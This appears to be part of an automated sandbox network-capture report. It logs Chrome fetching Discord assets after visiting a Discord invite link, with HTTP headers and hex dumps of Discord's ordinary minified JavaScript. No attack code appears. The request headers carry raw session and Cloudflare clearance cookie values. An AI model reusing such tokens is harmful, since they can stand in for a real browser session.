                                                                                                                                                                                                                                                                                    Data Ascii: dth:e,innerHeight:s}=window;if(0===t||0===i)return null;let n=i/t,h=e,a=Math.round(e*n);return a<s&&(a=s,h=Math.round(s*(n=t/i))),{naturalWidth:t,naturalHeight:i,width:h,height:a}}function w(t){let{splash:i,children:e}=t,[{width:s,height:a},l]=h.useState(
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:52 UTC1369INData Raw: 46 61 6c 6c 62 61 63 6b 3a 21 68 7d 29 3a 28 30 2c 6e 2e 6a 73 78 29 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 6d 2e 6d 6f 62 69 6c 65 57 61 76 65 7d 29 7d 72 65 6e 64 65 72 43 6f 6e 74 65 6e 74 28 29 7b 6c 65 74 7b 63 68 69 6c 64 72 65 6e 3a 74 2c 77 61 76 65 53 74 61 74 65 3a 69 2c 73 68 6f 77 4c 6f 67 6f 3a 65 2c 6c 6f 67 6f 43 6c 61 73 73 4e 61 6d 65 3a 73 2c 65 6d 62 65 64 64 65 64 3a 61 7d 3d 74 68 69 73 2e 70 72 6f 70 73 2c 7b 73 68 6f 77 57 61 76 65 41 6e 69 6d 61 74 69 6f 6e 3a 6c 7d 3d 74 68 69 73 2e 73 74 61 74 65 3b 72 65 74 75 72 6e 28 30 2c 6e 2e 6a 73 78 73 29 28 68 2e 46 72 61 67 6d 65 6e 74 2c 7b 63 68 69 6c 64 72 65 6e 3a 5b 74 68 69 73 2e 72 65 6e 64 65 72 57 61 76 65 28 29 2c 28 30 2c 6e 2e 6a 73 78 73 29 28 22 64 69 76 22
                                                                                                                                                                                                                                                                                    Data Ascii: Fallback:!h}):(0,n.jsx)("div",{className:m.mobileWave})}renderContent(){let{children:t,waveState:i,showLogo:e,logoClassName:s,embedded:a}=this.props,{showWaveAnimation:l}=this.state;return(0,n.jsxs)(h.Fragment,{children:[this.renderWave(),(0,n.jsxs)("div"
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:52 UTC1369INData Raw: 6c 75 65 3a 65 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30 7d 29 3a 74 5b 69 5d 3d 65 2c 74 7d 69 2e 5a 3d 63 6c 61 73 73 20 74 7b 69 6e 69 74 69 61 6c 69 7a 65 28 29 7b 74 68 69 73 2e 69 6d 67 3d 6e 65 77 20 49 6d 61 67 65 2c 74 68 69 73 2e 69 6d 67 2e 6f 6e 6c 6f 61 64 3d 28 29 3d 3e 7b 74 68 69 73 2e 6c 6f 61 64 65 64 3d 21 30 7d 2c 74 68 69 73 2e 69 6d 67 2e 73 72 63 3d 6e 2c 74 68 69 73 2e 62 69 6e 64 28 29 7d 62 69 6e 64 28 29 7b 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6d 6f 75 73 65 6d 6f 76 65 22 2c 74 68 69 73 2e 68 61 6e 64 6c 65 4d 6f 75 73 65 4d 6f 76 65 2c 21 31 29 7d 75 6e 62 69 6e 64 28 29 7b 77 69 6e 64 6f 77 2e 72 65 6d 6f
                                                                                                                                                                                                                                                                                    Data Ascii: lue:e,enumerable:!0,configurable:!0,writable:!0}):t[i]=e,t}i.Z=class t{initialize(){this.img=new Image,this.img.onload=()=>{this.loaded=!0},this.img.src=n,this.bind()}bind(){window.addEventListener("mousemove",this.handleMouseMove,!1)}unbind(){window.remo
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:52 UTC1369INData Raw: 3d 65 28 38 39 38 36 32 35 29 3b 66 75 6e 63 74 69 6f 6e 20 68 28 74 2c 69 2c 65 29 7b 72 65 74 75 72 6e 20 69 20 69 6e 20 74 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 69 2c 7b 76 61 6c 75 65 3a 65 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30 7d 29 3a 74 5b 69 5d 3d 65 2c 74 7d 6c 65 74 20 61 3d 5b 22 23 37 64 38 31 38 37 22 2c 22 23 31 38 31 39 31 63 22 2c 22 23 38 66 61 32 64 66 22 2c 22 23 34 66 35 34 35 63 22 5d 3b 69 2e 5a 3d 63 6c 61 73 73 20 74 7b 63 68 65 63 6b 42 6f 75 6e 64 73 28 29 7b 74 68 69 73 2e 78 3e 74 68 69 73 2e 6f 66 66 73 63 72 65 65 6e 58 3f 74 68 69 73 2e 78 3d 2d 74 68 69 73 2e 73 69 7a 65 3a 74 68 69 73 2e 79 3e 74 68
                                                                                                                                                                                                                                                                                    Data Ascii: =e(898625);function h(t,i,e){return i in t?Object.defineProperty(t,i,{value:e,enumerable:!0,configurable:!0,writable:!0}):t[i]=e,t}let a=["#7d8187","#18191c","#8fa2df","#4f545c"];i.Z=class t{checkBounds(){this.x>this.offscreenX?this.x=-this.size:this.y>th


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    127192.168.2.549848162.159.137.2324437288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:51 UTC673OUTGET /assets/f587337433e36ce917bd.js HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: discord.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                    Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:52 UTC960INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:51 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                                                    Content-Length: 13681
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    CF-Ray: 8e73d1083a604216-EWR
                                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://discord.com
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                    ETag: "59bb723decfa5a2c2b359ed4c541e33b"
                                                                                                                                                                                                                                                                                    Last-Modified: Fri, 22 Nov 2024 06:05:42 GMT
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                    Permissions-Policy: interest-cohort=()
                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tPaza%2BzcKp0ytVHTEjusTAOjCmqOZucMTdfHeFnBoggszW%2FNk1y0N7IxANMmKAdNCr5nDTLh39R8qrQAVKk4r8YUZHswzV8fNCuRYRs0H1gpiEbehyJ9lGRAd8nf"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:52 UTC409INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 36 30 36 37 33 22 5d 2c 7b 32 39 32 38 32 34 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 2e 65 78 70 6f 72 74 73 3d 22 2f 61 73 73 65 74 73 2f 30 30 66 65 38 61 36 35 35 37 65 32 30 34 65 62 39 35 30 33 2e 73 76 67 22 7d 2c 32 33 31 32 33 39 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 76 61 72 20 6c 3d 6e 28 39 39 30 35 34 37 29 2c 72 3d 6e 28 32 38 33 36 39 33 29 2c 69 3d 6e 28 35 37 30 31 34 30 29 2c 61 3d 6e 28 35 37 33 32 36 31 29 2c 75 3d 6e 28 39 38 31 36 33 31 29 3b 65 2e 5a 3d 7b 73 69 67 6e
                                                                                                                                                                                                                                                                                    Data Ascii: "use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["60673"],{292824:function(t){t.exports="/assets/00fe8a6557e204eb9503.svg"},231239:function(t,e,n){var l=n(990547),r=n(283693),i=n(570140),a=n(573261),u=n(981631);e.Z={sign
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:52 UTC1369INData Raw: 7b 76 61 72 20 65 3b 6c 65 74 20 6e 3d 21 31 2c 6c 3d 6e 75 6c 6c 3d 3d 74 3f 76 6f 69 64 20 30 3a 6e 75 6c 6c 3d 3d 3d 28 65 3d 74 2e 62 6f 64 79 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 65 3f 76 6f 69 64 20 30 3a 65 2e 65 6d 61 69 6c 5f 64 6f 6d 61 69 6e 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 6c 26 26 28 6e 3d 2d 31 21 3d 3d 6c 2e 73 70 6c 69 74 28 22 2e 22 29 2e 69 6e 64 65 78 4f 66 28 22 65 64 75 22 29 29 2c 28 30 2c 72 2e 69 47 29 28 7b 69 73 5f 65 64 75 5f 65 6d 61 69 6c 3a 6e 7d 29 7d 7d 2c 72 65 6a 65 63 74 57 69 74 68 45 72 72 6f 72 3a 21 31 7d 29 2c 73 65 6e 64 56 65 72 69 66 69 63 61 74 69 6f 6e 45 6d 61 69 6c 3a 61 73 79 6e 63 28 74 2c 65 2c 6e 29 3d 3e 28 61 77 61 69 74 20 61 2e 5a 2e 70 6f 73 74 28 7b 75 72 6c 3a 75 2e 41 4e 4d 2e 48 55 42 5f
                                                                                                                                                                                                                                                                                    Data Ascii: {var e;let n=!1,l=null==t?void 0:null===(e=t.body)||void 0===e?void 0:e.email_domain;return null!=l&&(n=-1!==l.split(".").indexOf("edu")),(0,r.iG)({is_edu_email:n})}},rejectWithError:!1}),sendVerificationEmail:async(t,e,n)=>(await a.Z.post({url:u.ANM.HUB_
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:52 UTC1369INData Raw: 7d 7d 7d 2c 35 38 38 37 30 35 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 6e 2e 64 28 65 2c 7b 52 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 55 7d 7d 29 2c 6e 28 34 31 31 31 30 34 29 3b 76 61 72 20 6c 3d 6e 28 32 30 30 36 35 31 29 2c 72 3d 6e 28 31 39 32 33 37 39 29 2c 69 3d 6e 28 34 34 32 38 33 37 29 2c 61 3d 6e 28 34 38 31 30 36 30 29 2c 75 3d 6e 28 33 38 38 39 30 35 29 2c 6f 3d 6e 28 36 38 36 35 34 36 29 2c 73 3d 6e 28 39 32 35 33 32 39 29 2c 63 3d 6e 28 33 37 32 37 36 39 29 2c 64 3d 6e 28 37 32 36 37 34 35 29 2c 5f 3d 6e 28 39 37 33 36 31 36 29 2c 45 3d 6e 28 31 33 31 37 30 34 29 2c 70 3d 6e 28 36 30 31 39 36 34 29 2c 66 3d 6e 28 35 39 38 30 37 37 29 2c 4e 3d 6e 28 35 39 34 31 37 34 29 2c 49 3d 6e 28 35 31 31 34 34 29 2c 41 3d 6e
                                                                                                                                                                                                                                                                                    Data Ascii: }}},588705:function(t,e,n){n.d(e,{R:function(){return U}}),n(411104);var l=n(200651),r=n(192379),i=n(442837),a=n(481060),u=n(388905),o=n(686546),s=n(925329),c=n(372769),d=n(726745),_=n(973616),E=n(131704),p=n(601964),f=n(598077),N=n(594174),I=n(51144),A=n
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:52 UTC1369INData Raw: 3f 28 30 2c 45 2e 6a 44 29 28 73 2e 63 68 61 6e 6e 65 6c 29 3a 6e 75 6c 6c 2c 5a 3d 6e 75 6c 6c 21 3d 73 2e 74 61 72 67 65 74 5f 61 70 70 6c 69 63 61 74 69 6f 6e 3f 6e 65 77 20 5f 2e 5a 28 73 2e 74 61 72 67 65 74 5f 61 70 70 6c 69 63 61 74 69 6f 6e 29 3a 6e 75 6c 6c 2c 44 3d 55 7c 7c 6e 75 6c 6c 3d 3d 73 2e 69 6e 76 69 74 65 72 3f 6e 75 6c 6c 3a 6e 65 77 20 66 2e 5a 28 73 2e 69 6e 76 69 74 65 72 29 2c 77 3d 21 28 6e 75 6c 6c 21 3d 73 2e 61 70 70 72 6f 78 69 6d 61 74 65 5f 6d 65 6d 62 65 72 5f 63 6f 75 6e 74 26 26 73 2e 61 70 70 72 6f 78 69 6d 61 74 65 5f 6d 65 6d 62 65 72 5f 63 6f 75 6e 74 3e 31 30 30 7c 7c 6e 75 6c 6c 21 3d 52 26 26 52 2e 68 61 73 46 65 61 74 75 72 65 28 41 2e 6f 4e 63 2e 43 4f 4d 4d 55 4e 49 54 59 29 29 26 26 6e 75 6c 6c 21 3d 44 2c 46
                                                                                                                                                                                                                                                                                    Data Ascii: ?(0,E.jD)(s.channel):null,Z=null!=s.target_application?new _.Z(s.target_application):null,D=U||null==s.inviter?null:new f.Z(s.inviter),w=!(null!=s.approximate_member_count&&s.approximate_member_count>100||null!=R&&R.hasFeature(A.oNc.COMMUNITY))&&null!=D,F
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:52 UTC1369INData Raw: 6f 6e 26 26 28 6e 3d 28 30 2c 6c 2e 6a 73 78 29 28 75 2e 4d 43 2c 7b 63 68 61 6e 6e 65 6c 3a 79 2c 73 69 7a 65 3a 61 2e 41 76 61 74 61 72 53 69 7a 65 73 2e 53 49 5a 45 5f 33 32 7d 29 29 29 3a 28 46 3d 67 2e 69 6e 74 6c 2e 73 74 72 69 6e 67 28 67 2e 74 2e 4f 73 64 59 38 50 29 2c 72 3d 74 29 7d 65 6c 73 65 20 69 66 28 6e 75 6c 6c 21 3d 44 29 7b 6c 65 74 20 74 3d 49 2e 5a 50 2e 67 65 74 46 6f 72 6d 61 74 74 65 64 4e 61 6d 65 28 44 2c 21 30 29 3b 72 3d 67 2e 69 6e 74 6c 2e 66 6f 72 6d 61 74 54 6f 50 6c 61 69 6e 53 74 72 69 6e 67 28 67 2e 74 5b 22 34 61 46 39 32 64 22 5d 2c 7b 75 73 65 72 6e 61 6d 65 3a 74 7d 29 2c 50 3d 21 30 2c 6f 3d 6e 75 6c 6c 21 3d 76 3f 6e 75 6c 6c 3a 28 30 2c 6c 2e 6a 73 78 29 28 75 2e 44 4b 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 53 2e 64
                                                                                                                                                                                                                                                                                    Data Ascii: on&&(n=(0,l.jsx)(u.MC,{channel:y,size:a.AvatarSizes.SIZE_32}))):(F=g.intl.string(g.t.OsdY8P),r=t)}else if(null!=D){let t=I.ZP.getFormattedName(D,!0);r=g.intl.formatToPlainString(g.t["4aF92d"],{username:t}),P=!0,o=null!=v?null:(0,l.jsx)(u.DK,{className:S.d
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:52 UTC1369INData Raw: 75 6c 6c 7d 2c 39 36 32 32 32 30 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 76 61 72 20 6c 3d 6e 28 33 39 36 31 32 29 2c 72 3d 6e 28 32 37 31 35 37 39 29 2c 69 3d 6e 28 37 35 36 36 34 37 29 2c 61 3d 6e 28 36 32 35 31 32 38 29 2c 75 3d 6e 28 36 32 36 31 33 35 29 2c 6f 3d 6e 28 39 35 34 38 32 34 29 2c 73 3d 6e 28 37 35 31 31 38 39 29 2c 63 3d 6e 28 39 38 31 36 33 31 29 3b 6c 65 74 20 64 3d 22 74 65 6d 70 6c 61 74 65 22 3b 65 2e 5a 3d 7b 2e 2e 2e 73 2e 5a 2c 6f 70 65 6e 4e 61 74 69 76 65 41 70 70 4d 6f 64 61 6c 28 74 29 7b 61 2e 5a 2e 6f 70 65 6e 4e 61 74 69 76 65 41 70 70 4d 6f 64 61 6c 28 74 2c 63 2e 45 74 6d 2e 47 55 49 4c 44 5f 54 45 4d 50 4c 41 54 45 5f 42 52 4f 57 53 45 52 29 7d 2c 6f 70 65 6e 4d 6f 62 69 6c 65 41 70 70 28 74 2c 65 29 7b 69 66
                                                                                                                                                                                                                                                                                    Data Ascii: ull},962220:function(t,e,n){var l=n(39612),r=n(271579),i=n(756647),a=n(625128),u=n(626135),o=n(954824),s=n(751189),c=n(981631);let d="template";e.Z={...s.Z,openNativeAppModal(t){a.Z.openNativeAppModal(t,c.Etm.GUILD_TEMPLATE_BROWSER)},openMobileApp(t,e){if
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:52 UTC1369INData Raw: 41 43 43 4f 55 4e 54 5f 56 41 4c 49 44 41 54 45 5f 54 4f 4b 45 4e 5f 46 41 49 4c 55 52 45 22 2c 75 73 65 72 49 64 3a 61 7d 29 3b 72 65 74 75 72 6e 7d 69 2e 5a 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 4d 55 4c 54 49 5f 41 43 43 4f 55 4e 54 5f 56 41 4c 49 44 41 54 45 5f 54 4f 4b 45 4e 5f 52 45 51 55 45 53 54 22 2c 75 73 65 72 49 64 3a 61 7d 29 3b 74 72 79 7b 6e 3d 61 77 61 69 74 20 72 2e 74 6e 2e 67 65 74 28 7b 75 72 6c 3a 63 2e 41 4e 4d 2e 4d 45 2c 68 65 61 64 65 72 73 3a 7b 61 75 74 68 6f 72 69 7a 61 74 69 6f 6e 3a 75 7d 2c 72 65 74 72 69 65 73 3a 33 2c 72 65 6a 65 63 74 57 69 74 68 45 72 72 6f 72 3a 21 31 7d 29 7d 63 61 74 63 68 28 65 29 7b 6c 65 74 20 74 3d 28 6e 75 6c 6c 3d 3d 65 3f 76 6f 69 64 20 30 3a 65 2e 73 74 61 74 75 73 29 3d 3d 3d 34
                                                                                                                                                                                                                                                                                    Data Ascii: ACCOUNT_VALIDATE_TOKEN_FAILURE",userId:a});return}i.Z.dispatch({type:"MULTI_ACCOUNT_VALIDATE_TOKEN_REQUEST",userId:a});try{n=await r.tn.get({url:c.ANM.ME,headers:{authorization:u},retries:3,rejectWithError:!1})}catch(e){let t=(null==e?void 0:e.status)===4
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:52 UTC1369INData Raw: 6e 65 77 55 73 65 72 54 79 70 65 3a 74 7d 29 29 7d 66 75 6e 63 74 69 6f 6e 20 69 28 29 7b 6c 2e 5a 2e 77 61 69 74 28 28 29 3d 3e 6c 2e 5a 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 4e 55 46 5f 43 4f 4d 50 4c 45 54 45 22 7d 29 29 7d 7d 2c 37 30 31 34 37 36 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 76 61 72 20 6c 2c 72 3b 6e 2e 64 28 65 2c 7b 4d 35 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6c 7d 7d 29 2c 28 72 3d 6c 7c 7c 28 6c 3d 7b 7d 29 29 5b 72 2e 4d 41 52 4b 45 54 49 4e 47 5f 55 4e 43 4c 41 49 4d 45 44 3d 30 5d 3d 22 4d 41 52 4b 45 54 49 4e 47 5f 55 4e 43 4c 41 49 4d 45 44 22 2c 72 5b 72 2e 49 4e 56 49 54 45 5f 55 4e 43 4c 41 49 4d 45 44 3d 31 5d 3d 22 49 4e 56 49 54 45 5f 55 4e 43 4c 41 49 4d 45 44 22 2c 72 5b 72 2e 4f
                                                                                                                                                                                                                                                                                    Data Ascii: newUserType:t}))}function i(){l.Z.wait(()=>l.Z.dispatch({type:"NUF_COMPLETE"}))}},701476:function(t,e,n){var l,r;n.d(e,{M5:function(){return l}}),(r=l||(l={}))[r.MARKETING_UNCLAIMED=0]="MARKETING_UNCLAIMED",r[r.INVITE_UNCLAIMED=1]="INVITE_UNCLAIMED",r[r.O
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:52 UTC1369INData Raw: 7d 6f 28 64 2c 22 64 69 73 70 6c 61 79 4e 61 6d 65 22 2c 22 50 68 6f 6e 65 53 74 6f 72 65 22 29 2c 6f 28 64 2c 22 70 65 72 73 69 73 74 4b 65 79 22 2c 22 50 68 6f 6e 65 53 74 6f 72 65 22 29 2c 65 2e 5a 3d 6e 65 77 20 64 28 61 2e 5a 2c 7b 50 48 4f 4e 45 5f 53 45 54 5f 43 4f 55 4e 54 52 59 5f 43 4f 44 45 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 6c 65 74 7b 63 6f 75 6e 74 72 79 43 6f 64 65 3a 65 7d 3d 74 3b 6c 3d 65 7d 2c 43 4f 4e 4e 45 43 54 49 4f 4e 5f 4f 50 45 4e 3a 63 2c 53 45 54 5f 4c 4f 43 41 54 49 4f 4e 5f 4d 45 54 41 44 41 54 41 3a 63 7d 29 7d 2c 36 33 30 37 32 34 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 76 61 72 20 6c 2c 72 2c 69 2c 61 2c 75 2c 6f 2c 73 2c 63 2c 64 2c 5f 3b 6e 2e 64 28 65 2c 7b 45 57 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65
                                                                                                                                                                                                                                                                                    Data Ascii: }o(d,"displayName","PhoneStore"),o(d,"persistKey","PhoneStore"),e.Z=new d(a.Z,{PHONE_SET_COUNTRY_CODE:function(t){let{countryCode:e}=t;l=e},CONNECTION_OPEN:c,SET_LOCATION_METADATA:c})},630724:function(t,e,n){var l,r,i,a,u,o,s,c,d,_;n.d(e,{EW:function(){re
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:52 UTC1369INData Raw: 3b 6c 65 74 7b 76 65 72 73 69 6f 6e 3a 6e 2c 2e 2e 2e 6c 7d 3d 65 3b 72 65 74 75 72 6e 20 31 21 3d 3d 6e 3f 6e 75 6c 6c 3a 6c 7d 6e 65 77 20 75 2e 5a 28 22 55 73 65 72 46 6c 6f 77 41 6e 61 6c 79 74 69 63 73 22 29 3b 6c 65 74 20 70 3d 28 30 2c 6c 2e 55 29 28 29 28 28 30 2c 72 2e 58 52 29 28 28 74 2c 65 29 3d 3e 28 7b 66 6c 6f 77 73 3a 7b 7d 2c 63 75 72 72 65 6e 74 46 6c 6f 77 3a 6e 75 6c 6c 2c 61 63 74 69 76 65 46 6c 6f 77 3a 28 29 3d 3e 7b 76 61 72 20 74 3b 6c 65 74 20 6e 3d 6e 75 6c 6c 21 3d 3d 28 74 3d 65 28 29 2e 63 75 72 72 65 6e 74 46 6c 6f 77 29 26 26 76 6f 69 64 20 30 21 3d 3d 74 3f 74 3a 61 2e 4b 2e 67 65 74 28 64 29 3b 69 66 28 6e 75 6c 6c 3d 3d 6e 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 6c 65 74 7b 5b 6e 5d 3a 6c 7d 3d 65 28 29 2e 66 6c 6f 77 73
                                                                                                                                                                                                                                                                                    Data Ascii: ;let{version:n,...l}=e;return 1!==n?null:l}new u.Z("UserFlowAnalytics");let p=(0,l.U)()((0,r.XR)((t,e)=>({flows:{},currentFlow:null,activeFlow:()=>{var t;let n=null!==(t=e().currentFlow)&&void 0!==t?t:a.K.get(d);if(null==n)return null;let{[n]:l}=e().flows


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    128192.168.2.549849162.159.137.2324437288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:51 UTC1385OUTGET /assets/410a2166a48c9e482e2a.svg HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: discord.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                    Referer: https://discord.com/invite/BNXa5rYFXM
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                    Cookie: __dcfduid=398fc180a9d711efaa23651edf07a944; __sdcfduid=398fc181a9d711efaa23651edf07a94443831d3c4767dd9386d009f37fd1539881ec275065364f4f19a9fcb7ecbe1072; __cfruid=7b90cdef04b10d79eeb745f3cdae90fc3fd17a2d-1732392732; _cfuvid=7bYx.Qayg1ZBezZbJidK.XxAv8tlou0EhnItAMmQdvI-1732392732068-0.0.1.1-604800000; cf_clearance=rkak0bZK2is8J.BTEsBQ85I6lLKdJOtO3C3I6g3Q2aI-1732392767-1.2.1.1-41dyMfWA6Giapxm7lJa8LloGMnnwxuwVOOsck0Z..pcqElJZGi5MlQcVQuq654zdeBZ9dMu_ewaOpzmqA6XFLeKAEUKRq9RGkCCVE7EBjr4DjyCtvYENHUV1ahY3SOOIbk2nVOGVgn2ccN2dfSIRRDq.Fj7zO7rGbJsNMufCLn2UOD8C9NdAlgw6z_Neaun.US2XBFEBTJWgHF3XZalbOI1PgVyJGY_JuOgslX0PK6YyE_jndmfsUdHinYzZ2LkDx8MJ9M6zW8hUOrwz20hKKbt91LtTsibDyPcrmVw3VbC1WAnOzT0i3VnKFq62aV49i32I8tnsoyN7uBe8SpirZV3.SByxFnOYzii6gRK415ztK4zctCgnFtDrm8X0EYCQ
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:52 UTC962INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:52 GMT
                                                                                                                                                                                                                                                                                    Content-Type: image/svg+xml
                                                                                                                                                                                                                                                                                    Content-Length: 395
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    CF-Ray: 8e73d109fa8742ee-EWR
                                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://discord.com
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                    ETag: "e843c51c0eec3801b70cae5c45ad343f"
                                                                                                                                                                                                                                                                                    Last-Modified: Sun, 02 Oct 2022 01:17:45 GMT
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                    Permissions-Policy: interest-cohort=()
                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KIfkfIKRgJs5ST9wBeL%2BFAz%2BWWhN4za49GT%2FJs3RdujZFjJDcaqynti9a4SWXPpW6Uh%2Bx3M6jSOeC6FIp5%2F0SRyue20e5xQpJy3OPKMCwG6dAaraMVqLxdHC9VtE"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                    Server: cloudflare
